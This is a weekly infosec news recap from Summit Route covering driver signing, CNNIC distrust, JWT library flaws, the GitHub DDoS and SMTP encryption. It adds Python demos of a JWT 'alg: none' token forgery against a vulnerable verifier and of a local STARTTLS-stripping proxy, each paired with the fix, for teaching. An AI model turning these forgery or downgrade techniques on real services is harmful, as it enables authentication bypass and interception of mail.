Downclimb: Summit Route’s Weekly Infosec News Recap
2015.03.29 – 2015.04.05: https://SummitRoute.com
Quotes
“How does enabling 2FA help when database containing passwords (and likely 2FA seeds) is the compromise? http://slackhq.com/post/114696167740/march-2015-security-incident-and-launch-of-2fa” Root Labs
“The Security Industry is not designed to solve your security problems just like McDonald’s isn’t designed to solve world hunger. #dollars” @beaker
“Long uptime for security. No one ever tests their exploits against browsers with a week of uptime. Heap feng shui? More like heap makeover” the grugq
“To sum up, attribution to support retribution can only be done through offense, because deception is too easy.” Dave Aitel
Top stories
Driver Signing changes in Windows 10
Beginning with the release of Windows 10, new kernel-mode drivers must be submitted to Microsoft and signed through the Windows Hardware Developer Center Dashboard portal, and submitting requires an EV code-signing certificate. A side effect is that Microsoft will hold a copy of every new driver that can load on Windows 10. For backwards compatibility, drivers signed with a cross-signing certificate issued before the Windows 10 release will continue to load, so the change does not retire existing signatures; it only closes the door for new ones.
- http://blogs.msdn.com/b/windows_hardware_certification/archive/2015/04/01/driver-signing-changes-in-windows-10.aspx
The failure of the security industry
Article by Alex Stamos (CISO of Yahoo) arguing, among other concerns, that the industry needs a shared platform rather than every vendor shipping its own agent.
Also relevant is this tweet storm from him:
“Here are some tips for security sales.
1) A demo is worth a thousand .pptx slides. cc @Beaker @daviottenheimer
2) CISOs don’t buy products, we send leads to directors who make the real decisions. Every time we risk them quitting, so it’s touchy
3) No, I don’t want to have “just” a “quick” 60 minute call. Somebody who takes those calls doesn’t actually have op responsibilities
4) You say “Huge mega-bank deployed us”. I hear “This product costs a fortune and only works with Windows”
5) No, I can’t come to dinner the Monday night of RSA. Every restaurant in the five county Bay Area is hosting an RSA dinner that night
6) The more you promise the less I believe. The key for earning trust is to demonstrate that you understand the limits of your product.
7) If your security product has general IT or operational benefits it is 10x easier to buy.
8) Best company to copy in this is Splunk. It’s a) A platform b) Has non-sec uses c) is testable without money or phone calls. Brilliant
9) The more popular a product aimed against nation-state adversaries, the less useful it becomes. Build to be flexible and unpredictable”
- http://www.scmagazine.com/the-failure-of-the-security-industry/article/403261/
CNNIC Certificate Authority no longer trusted
After discovering last week that a company called MCS Holdings had misused an intermediate certificate issued to it by CNNIC, Google has decided to stop recognizing the Chinese root certificate authority CNNIC. Mozilla has also taken action against CNNIC, but only by refusing to trust certificates from CNNIC issued after 2015-04-01. Conceptually, that punishment does not match the threat model. If you believe CNNIC is acting maliciously, it remains perfectly capable of issuing new certificates with a notBefore date earlier than 2015-04-01, since the issuer alone controls that field. If caught, that would of course be much harder to explain away, so the working assumption must be that CNNIC can still be trusted but needed a strong slap on the wrist for its negligence.
- http://googleonlinesecurity.blogspot.com/2015/03/maintaining-digital-certificate-security.html?m=1
- https://blog.mozilla.org/security/2015/04/02/distrusting-new-cnnic-certificates/
Critical vulnerabilities in JSON Web Token libraries
JSON Web Token (JWT) is a standard for a compact, signed token that carries a set of claims. A token is three base64url segments: a header naming the signing algorithm, the claims payload, and the signature. Several libraries let the untrusted header decide how verification is done: setting `alg` to `none` let an attacker drop the signature entirely, and switching an RS256 token to HS256 made the server use its RSA public key (which the attacker can fetch) as the HMAC secret, so the attacker could sign arbitrary claims.
- https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
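As an added example (not code from the Auth0 post or from any of the affected libraries), the following Python reproduces the `alg: none` bypass against a verifier that takes the algorithm from the token header, next to a verifier that pins the algorithm it expects. The secret, claims and helper names are constructed for the demo; the RS256-to-HS256 key-confusion variant described in the post needs an RSA key pair and is not shown.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo secret; a real deployment keeps this out of source.
SECRET = b"constructed-demo-hmac-secret"


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    """One base64url-encoded JSON segment of a token."""
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode("utf-8"))


def sign_hs256(payload: dict, key: bytes) -> str:
    """Mint a legitimate HS256 token."""
    signing_input = _segment({"alg": "HS256", "typ": "JWT"}) + "." + _segment(payload)
    sig = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_alg_none(payload: dict) -> str:
    """What the attacker sends: header says 'none', signature segment left empty."""
    return _segment({"alg": "none", "typ": "JWT"}) + "." + _segment(payload) + "."


def _split(token: str):
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header = json.loads(b64url_decode(parts[0]))
    return header, parts[0] + "." + parts[1], parts[1], parts[2]


def verify_vulnerable(token: str, key: bytes) -> dict:
    """The flawed pattern: the algorithm is taken from the attacker-controlled header."""
    header, signing_input, payload_seg, sig_seg = _split(token)
    alg = header.get("alg")
    if alg == "none":
        # The bug in one line: an unsigned token is treated as verified.
        return json.loads(b64url_decode(payload_seg))
    if alg == "HS256":
        expected = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_seg)):
            return json.loads(b64url_decode(payload_seg))
    raise ValueError("signature verification failed")


def verify_hardened(token: str, key: bytes, expected_alg: str = "HS256") -> dict:
    """The verifier decides the algorithm; the header must merely agree with it."""
    header, signing_input, payload_seg, sig_seg = _split(token)
    if header.get("alg") != expected_alg:
        raise ValueError("unexpected alg %r" % header.get("alg"))
    if expected_alg != "HS256":
        raise ValueError("only HS256 is wired up in this demo")
    expected = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_seg)):
        raise ValueError("signature verification failed")
    return json.loads(b64url_decode(payload_seg))


def accepts(verifier, token: str, key: bytes) -> bool:
    """True if the given verifier treats the token as valid."""
    try:
        verifier(token, key)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    forged = forge_alg_none({"sub": "alice", "admin": True})
    print("vulnerable accepts forged token:", accepts(verify_vulnerable, forged, SECRET))
    print("hardened accepts forged token:  ", accepts(verify_hardened, forged, SECRET))
```

The fix is the same in any library: the server decides which algorithm and which key apply to a token and only checks that the header agrees; it never dispatches on what the header says.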
Github DDoS
Github was under a DDoS attack from China aimed at two projects that help bypass the Great Firewall of China (mirrors for GreatFire and the Chinese-language New York Times). The Great Firewall itself appears to have been responsible: some fraction of requests from outside China for Baidu's analytics JavaScript were intercepted and the script replaced with one that made the browser repeatedly request those two project pages. This is a really sloppy DDoS, and as retaliation (it is sloppy in part because this is possible) Github served those pages with JavaScript that popped up an alert in the attacking browsers every 5 seconds.
- http://insight-labs.org/?author=8
The Sad State of SMTP Encryption
SMTP (the protocol used to send email between servers) rarely gets encryption right. STARTTLS is opportunistic: a server that does not advertise it, or whose advertisement is stripped by an active attacker in the path, simply receives the mail in plaintext, and even when TLS is negotiated the certificate is seldom validated. An attacker positioned between two mail servers can therefore read the traffic.
- https://blog.filippo.io/the-sad-state-of-smtp-encryption/
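An added example, not taken from the linked post: a local stand-in mail server that offers STARTTLS, a stripping proxy in front of it that plays the active attacker, and an smtplib client that probes each. Overwriting the capability with Xs rather than deleting the line is the classic strip (the stream keeps its length); the server, proxy, hostnames and the choose_transport policy are all constructed for this demo.

```python
import smtplib
import socket
import socketserver
import threading


class FakeSMTPServer(socketserver.StreamRequestHandler):
    """Constructed stand-in for a mail server that does offer STARTTLS."""

    def handle(self):
        self.wfile.write(b"220 mail.example.test ESMTP demo\r\n")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd = line.strip().upper()
            if cmd.startswith(b"EHLO"):
                self.wfile.write(b"250-mail.example.test\r\n250-STARTTLS\r\n250 8BITMIME\r\n")
            elif cmd.startswith(b"QUIT"):
                self.wfile.write(b"221 bye\r\n")
                return
            else:
                self.wfile.write(b"502 command not implemented in demo\r\n")


class StripStartTLSProxy(socketserver.StreamRequestHandler):
    """Active attacker (or careless middlebox) in the path: relays the session
    unchanged except that STARTTLS is overwritten with Xs of the same length."""

    def handle(self):
        with socket.create_connection(self.server.upstream, timeout=5) as up:
            upstream = up.makefile("rb")
            self.wfile.write(upstream.readline())  # relay the 220 greeting
            while True:
                line = self.rfile.readline()
                if not line:
                    return
                up.sendall(line)
                while True:  # relay one (possibly multi-line) reply
                    reply = upstream.readline()
                    if not reply:
                        return
                    self.wfile.write(reply.replace(b"STARTTLS", b"XXXXXXXX"))
                    if reply[3:4] == b" ":  # "250 " or "221 " is the last line
                        break
                if line.strip().upper().startswith(b"QUIT"):
                    return


def _serve(handler, upstream=None):
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), handler)
    srv.daemon_threads = True
    srv.upstream = upstream  # only the proxy uses this
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def offers_starttls(port: int) -> bool:
    """What a client learns from EHLO; opportunistic TLS keys off nothing else."""
    with smtplib.SMTP("127.0.0.1", port, local_hostname="demo.client", timeout=5) as client:
        client.ehlo()
        return client.has_extn("starttls")


def choose_transport(starttls_offered: bool, require_tls: bool) -> str:
    """Opportunistic policy falls back to plaintext; a strict policy refuses."""
    if starttls_offered:
        return "tls"
    if require_tls:
        raise ConnectionError("STARTTLS not offered; refusing to send in the clear")
    return "plaintext"


def run_demo():
    """Probe the server directly and through the stripping proxy: (True, False)."""
    server = _serve(FakeSMTPServer)
    proxy = _serve(StripStartTLSProxy, upstream=server.server_address)
    try:
        direct = offers_starttls(server.server_address[1])
        through_mitm = offers_starttls(proxy.server_address[1])
        return direct, through_mitm
    finally:
        for srv in (proxy, server):
            srv.shutdown()
            srv.server_close()


if __name__ == "__main__":
    direct, through_mitm = run_demo()
    print("direct:   STARTTLS offered =", direct, "->", choose_transport(direct, False))
    print("via MITM: STARTTLS offered =", through_mitm, "->", choose_transport(through_mitm, False))
```

The opportunistic client sees no difference between a server that never supported TLS and one whose offer was stripped, which is why a sending MTA that wants confidentiality has to require TLS (and validate the peer certificate) for the destinations it cares about rather than merely prefer it.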
Newspaper news
- Executive Order imposes sanctions against hackers: President Obama signed an executive order that allows the assets of foreign hackers to be seized. Much of this was already possible, so the order is largely a political statement, though it may make these rules easier to enforce. The most interesting aspect is that it also allows seizing the assets of companies that have profited from stolen intellectual property. So if an American company can show that a Chinese company, for example, used information stolen from it, the US government can seize that company's assets whether or not anyone can prove the company was behind the theft itself. This potentially sidesteps some attribution problems. Good commentary here.
Conference materials and publications
- Troopers: We mentioned some slides from Troopers last week, but now all videos are up.
- Modern Binary Exploitation: Course materials for a course on exploitation being taught at Rensselaer Polytechnic Institute (RPI). It’s about mid-way through the semester, so more materials will appear here in coming weeks.
Tools
- FreeSentry: FreeSentry is an LLVM plugin to mitigate use-after-free vulnerabilities. It's open-source but still in alpha stages. Introductory post is here.
Other reads
- Truecrypt audit complete: The final phase of the Truecrypt audit found no backdoors or severe design flaws; the issues it did note were lower severity. The main take-away is thus that you can feel reasonably safe using Truecrypt.
- Volatile Cedar: Check Point report on a threat actor out of Lebanon.
- Out with unwanted ad injectors: 5% of visitors to Google had at least one ad injector installed.